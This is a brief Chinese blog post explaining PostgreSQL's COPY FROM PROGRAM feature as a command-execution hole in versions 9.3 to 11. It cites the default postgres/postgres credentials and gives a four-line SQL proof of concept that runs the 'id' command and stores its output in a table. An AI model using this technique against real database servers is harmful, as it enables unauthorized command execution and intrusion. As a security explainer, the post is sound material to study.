PostgreSQL 高权限命令执行漏洞 - Kirin博客

PostgreSQL 高权限命令执行漏洞

作者: A.毒蜂

全网最全的网络资源分享网站

标签:

漏洞

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。


默认账号密码为postgres/postgres。

首先连接到postgres中,并执行参考链接中的POC:


  1. <font face="宋体" size="4">DROP TABLE IF EXISTS cmd_exec;

  2. CREATE TABLE cmd_exec(cmd_output text);

  3. COPY cmd_exec FROM PROGRAM 'id';

  4. SELECT * FROM cmd_exec;</font>



FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中

大概就这些……

分享到:
加入交流群
未经允许不得转载:

作者: A.毒蜂, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《PostgreSQL 高权限命令执行漏洞》 发布于2020-10-9

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫